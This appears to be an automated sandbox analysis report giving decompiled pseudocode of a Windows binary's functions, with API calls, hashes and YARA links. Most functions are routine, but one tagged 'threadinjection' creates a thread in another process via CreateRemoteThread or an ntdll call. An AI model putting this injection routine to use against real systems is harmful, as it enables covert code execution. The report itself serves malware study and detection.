                                                                                                                Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                0x0040a27d
                                                                                                                0x0040a286
                                                                                                                0x0040a290
                                                                                                                0x0040a29d
                                                                                                                0x00000000
                                                                                                                0x0040a32f
                                                                                                                0x0040a29f
                                                                                                                0x0040a2a4
                                                                                                                0x0040a2ad
                                                                                                                0x0040a2b6
                                                                                                                0x0040a2bc
                                                                                                                0x0040a2be
                                                                                                                0x0040a2c4
                                                                                                                0x0040a2c8
                                                                                                                0x0040a2ce
                                                                                                                0x0040a2e3
                                                                                                                0x0040a2ed
                                                                                                                0x0040a2fb
                                                                                                                0x0040a2fe
                                                                                                                0x0040a305
                                                                                                                0x0040a30c
                                                                                                                0x0040a30f
                                                                                                                0x0040a313
                                                                                                                0x00000000
                                                                                                                0x0040a31a
                                                                                                                0x0040a338

                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,73B768A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                0x00401676
                                                                                                                0x0040167e
                                                                                                                0x0040168a
                                                                                                                0x0040168c
                                                                                                                0x00401690
                                                                                                                0x00401691
                                                                                                                0x00401696
                                                                                                                0x0040169d
                                                                                                                0x004016a2
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016aa
                                                                                                                0x004016ad
                                                                                                                0x004016ae
                                                                                                                0x004016b3
                                                                                                                0x004016b9
                                                                                                                0x004016bb
                                                                                                                0x004016bc
                                                                                                                0x004016c1
                                                                                                                0x004016c8
                                                                                                                0x004016cd
                                                                                                                0x004016ce
                                                                                                                0x004016ea
                                                                                                                0x004016ff
                                                                                                                0x0040170c
                                                                                                                0x004016d0
                                                                                                                0x004016e3
                                                                                                                0x004016e3
                                                                                                                0x00401711
                                                                                                                0x00401714
                                                                                                                0x00000000
                                                                                                                0x00401719
                                                                                                                0x0040171c

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                0x00405132
                                                                                                                0x00405135
                                                                                                                0x00405139
                                                                                                                0x0040513e
                                                                                                                0x00405141
                                                                                                                0x004051b3
                                                                                                                0x00405143
                                                                                                                0x00405145
                                                                                                                0x00405147
                                                                                                                0x0040514c
                                                                                                                0x0040514e
                                                                                                                0x00405151
                                                                                                                0x00405151
                                                                                                                0x0040515b
                                                                                                                0x0040515c
                                                                                                                0x0040515d
                                                                                                                0x0040515e
                                                                                                                0x0040515f
                                                                                                                0x00405168
                                                                                                                0x00405169
                                                                                                                0x00405171
                                                                                                                0x00405173
                                                                                                                0x00405174
                                                                                                                0x00405182
                                                                                                                0x00405184
                                                                                                                0x00405189
                                                                                                                0x0040518c
                                                                                                                0x00405194
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405196
                                                                                                                0x0040519a
                                                                                                                0x0040519b
                                                                                                                0x004051a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004051a1
                                                                                                                0x004051a3
                                                                                                                0x004051a3
                                                                                                                0x004051a6
                                                                                                                0x004051af
                                                                                                                0x004051b0
                                                                                                                0x004051b7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                                                0x004075bb
                                                                                                                0x004075c2
                                                                                                                0x004075c7
                                                                                                                0x004075ca
                                                                                                                0x004075cd
                                                                                                                0x004075d8
                                                                                                                0x004075e9
                                                                                                                0x004075fc
                                                                                                                0x00407600
                                                                                                                0x00407601
                                                                                                                0x00407606
                                                                                                                0x00407609
                                                                                                                0x0040760e
                                                                                                                0x00407619
                                                                                                                0x0040761e
                                                                                                                0x0040761f
                                                                                                                0x00407624
                                                                                                                0x00407636

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                0x00405080
                                                                                                                0x00405086
                                                                                                                0x0040508b
                                                                                                                0x0040508e
                                                                                                                0x00405091
                                                                                                                0x00405097
                                                                                                                0x0040509d
                                                                                                                0x004050a4
                                                                                                                0x004050ab
                                                                                                                0x004050b2
                                                                                                                0x004050b5
                                                                                                                0x004050bc
                                                                                                                0x004050cb
                                                                                                                0x004050e0
                                                                                                                0x004050cd
                                                                                                                0x004050d1
                                                                                                                0x004050dc
                                                                                                                0x004050dc

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                0x00409072
                                                                                                                0x00409074
                                                                                                                0x0040907d
                                                                                                                0x00409086
                                                                                                                0x0040908e
                                                                                                                0x004090a5
                                                                                                                0x004090a5
                                                                                                                0x0040908e
                                                                                                                0x004090ac

                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AD85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;
				char** _t9;

				_t7 = 0;
				_t8 = E00405436(L"shlwapi.dll");
				 *_t9 = "SHAutoComplete";
				_t3 = GetProcAddress(_t8, ??);
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}







                                                                                                                0x0040ad8c
                                                                                                                0x0040ad93
                                                                                                                0x0040ad95
                                                                                                                0x0040ad9d
                                                                                                                0x0040ada5
                                                                                                                0x0040adb2
                                                                                                                0x0040adb2
                                                                                                                0x0040adb5
                                                                                                                0x0040adbf

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                • Opcode ID: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction ID: 3ba04cc2888c968bb17b12a51753cff707eeab9003a5d350ca2caef87bad7666
                                                                                                                • Opcode Fuzzy Hash: 60c0f151f26cb5c38cd65ac108f35652f4abbc6483df8549b5860e56d1e4938b
                                                                                                                • Instruction Fuzzy Hash: E1D01235211111EBD7616B66AD44A9F7AA6DFC1351B060036F544F2191DB3C4846C669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406597, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
				wchar_t* _t2;
				wchar_t* _t6;

				_t6 = __esi;
				E00404AD9(__esi);
				_t2 = wcsrchr(__esi, 0x2e);
				if(_t2 != 0) {
					 *_t2 =  *_t2 & 0x00000000;
				}
				return wcscat(_t6, L"_lng.ini");
			}





                                                                                                                0x00406597
                                                                                                                0x00406598
                                                                                                                0x004065a0
                                                                                                                0x004065aa
                                                                                                                0x004065ac
                                                                                                                0x004065ac
                                                                                                                0x004065bd

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction ID: e4456dc4ef972d75cd366ed24565615e7e819105f92635e6590d4ece6e8d8120
                                                                                                                • Opcode Fuzzy Hash: 3432a58373c8f6497560b18ec501466e1d989437fee4d639b0ed4d8698fe302d
                                                                                                                • Instruction Fuzzy Hash: 16C01292682620A4E2223322AC03B4F1248CF62324F21407BF906381C7EFBD826180EE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                0x0040ac59
                                                                                                                0x0040ac60
                                                                                                                0x0040ac68
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac75
                                                                                                                0x0040ac7b
                                                                                                                0x00000000
                                                                                                                0x0040ac7b
                                                                                                                0x0040ac6d
                                                                                                                0x0040ac80

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                0x00406670
                                                                                                                0x0040667a
                                                                                                                0x00406680
                                                                                                                0x00406686
                                                                                                                0x0040668b
                                                                                                                0x0040668d
                                                                                                                0x00406693
                                                                                                                0x00406699
                                                                                                                0x0040669f
                                                                                                                0x004066a9
                                                                                                                0x004066ac
                                                                                                                0x004066af
                                                                                                                0x004066b9
                                                                                                                0x004066c7
                                                                                                                0x004066d9
                                                                                                                0x004066c9
                                                                                                                0x004066c9
                                                                                                                0x004066cc
                                                                                                                0x004066cf
                                                                                                                0x004066d2
                                                                                                                0x004066d5
                                                                                                                0x004066d5
                                                                                                                0x004066db
                                                                                                                0x004066dd
                                                                                                                0x004066e0
